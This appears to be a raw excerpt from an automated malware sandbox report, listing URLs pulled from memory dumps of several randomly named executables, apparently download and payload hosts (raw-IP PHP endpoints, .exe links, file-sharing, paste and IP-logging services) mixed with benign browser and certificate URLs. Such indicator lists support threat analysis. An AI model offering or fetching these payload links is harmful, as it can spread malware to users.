                                                                        https://monoblocked.com/525403/setup.exes9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          https://turnitin.com/robot/crawlerinfo.html)cannotPA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpfalse
                                                                            http://5.42.66.10/download/th/space.php(9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507524439.0000000002AE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              https://dod.fastbutters.com:80/style/060.exeEQ9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                https://c.574859385.xyz/9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  http://5.42.66.10/download/th/getimage12.phpUV9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    https://carthewasher.net/ba05c0a0a72880db02f3b2bf7866285a/cad54ba5b01423b1af8ec10ab5719d97.exe9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1443603426.000000000417B000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1443603426.0000000004148000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      https://zanzibarpivo.com:80/7725eaa6592c80f8124e769b4e8a07f7.exe89wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        https://monoblocked.com:80/525403/setup.exe9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.00000000040F9000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=u5v8.0.exe, 0000000A.00000003.1500584438.0000000004307000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpfalse
                                                                                              http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnectionQg_Appv5.exe, 00000018.00000002.2204224716.00000000070FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                https://zanzibarpivo.com:80/7725eaa6592c80f8124e769b4e8a07f7.exe9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  https://www.ecosia.org/newtab/u5v8.0.exe, 0000000A.00000003.1500584438.0000000004307000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    http://ocsp.sectigo.com0&t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      http://www.symauth.com/cps0(Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        https://zanzibarpivo.com:80/7725eaa6592c80f8124e769b4e8a07f7.exeJ9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          http://5.42.66.10/download/th/space.php4W9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bru5v8.0.exe, 0000000A.00000003.1948291370.0000000030A93000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              http://togaterecutirenics.sbs/rt9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                https://cheremushki.net/mV9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  https://triedchicken.net:80/cad54ba5b01423b1af8ec10ab5719d97.exe9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    https://yip.su/RNWPd.exeChttps://pastebin.com/raw/E0rY26ni5https://iplogger.com/1lyxzfile.exe, 00000000.00000002.1323600743.0000027F3A471000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1323600743.0000027F39A71000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      https://vk.com:80/doc329118071_676158749?hash=wJqTXfnxe0acmwC4vumRgawHgxCuE6EviXjICmkirIT&dl=YVEMDGi9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.00000000040F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        http://176.113.115.135/ohhellyxe9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          http://togaterecutirenics.sbs/rtxe3W9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            https://vk.com:80/doc5294803_668776833?hash=0O6PF91bZH66jRdVdr0Yhs0vV73FDPMFrSckqwaaZuH&dl=PH90vp0b09wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.00000000040F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              http://176.113.115.135/ohhellyPJ9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                http://www.symauth.com/rpa00Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  https://carthewasher.net/uQ9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    http://www.google.com/feedfetcher.html)HKLMPA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpfalse
                                                                                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.Qb0WswhkLhoau5v8.0.exe, 0000000A.00000003.1948291370.0000000030A93000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        https://ipinfo.io/namehttps://ipgeolocation.io/status9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1374404248.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000003.1861206412.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000002.1881705606.0000000140001000.00000040.00000001.01000000.00000015.sdmpfalse
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepP#file.exe, 00000000.00000002.1326287625.0000027F49071000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            https://blockchain.infoindexzUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpfalse
                                                                                                                                              http://www.info-zip.org/Qg_Appv5.exe, 00000018.00000002.2204224716.0000000007353000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                https://vk.com/doc5294803_668862025?hash=rZAtNKZ8jzd7e9UKuB7jZZstkXZGEcmTXg0oxAzukh8&dl=bnAa6o9El06I9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.0000000004114000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.0000000004114000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  https://zanzibarpivo.com/7725eaa6592c80f8124e769b4e8a07f7.exexe9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    http://www.avantbrowser.com)MOT-V9mm/00.62PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                      http://localhost:3433/https://duniadekho.baridna:PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmptrue
                                                                                                                                                        https://zanzibarpivo.com/7725eaa6592c80f8124p9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002AFB000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002AFA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002AF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          http://search.msn.com/msnbot.htm)pkcs7:PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                            http://185.172.128.203/dl.php9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              https://cheremushki.net/EQ9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://vk.com/doc5294803_668627934?hash=KOcSmbd2hjdTG4DLhdJgoCSrHOpCJeuTNRte86dnj0k&dl=iwW1iFTFzY3z9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1495494393.0000000004130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://176.113.115.135/ohhellyOW9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://monoblocked.com:80/525403/setup.exemQ9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://zanzibarpivo.com/7725eaa6592c80f8124e769b4e8a07f7.exe4ba5b01423b1af8ec10ab5719d97.exe9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B23000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        http://ocsp.sectigo.com0file.exe, 00000000.00000002.1323600743.0000027F39071000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1326287625.0000027F49071000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1323600743.0000027F3A57C000.00000004.00001000.00020000.00000000.sdmp, VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://monoblocked.com/525403/setup.exexemQ9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            http://wikkt.com/forum/index.phpEsc9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1488155637.0000000004165000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464787413.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1480209801.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479436217.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1484968628.0000000004164000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://dod.fastbutters.com:80/style/060.exeG9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447491375.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445863210.0000000002AD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://zanzibarpivo.com/7725eaa6592c80f8124e769b4e8a07f7.exeexe9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002AF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://togaterecutirenics.sbs/rtB9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1453908557.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=u5v8.0.exe, 0000000A.00000003.1500584438.0000000004307000.00000004.00000020.00020000.00000000.sdmpfalse
